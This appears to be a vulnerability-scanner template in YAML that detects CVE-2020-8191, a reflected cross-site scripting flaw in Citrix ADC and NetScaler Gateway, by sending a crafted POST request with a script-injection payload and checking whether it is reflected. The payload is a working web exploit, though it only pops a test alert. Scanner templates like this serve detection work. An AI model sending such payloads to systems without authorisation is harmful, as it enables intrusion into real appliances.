34 lines
926 B
YAML
34 lines
926 B
YAML
id: cve-2020-8191
|
|
|
|
info:
|
|
name: Citrix ADC & NetScaler Gateway Reflected XSS
|
|
# Leads to RCE
|
|
author: dwisiswant0
|
|
severity: high
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /menu/stapp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
DNT: 1
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
Content-Length: 96
|
|
Content-Type: application/x-www-form-urlencoded
|
|
X-NITRO-USER: xpyZxwy6
|
|
|
|
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "</title><script>alert(31337)</script>"
|
|
part: body
|
|
- type: status
|
|
status:
|
|
- 200
|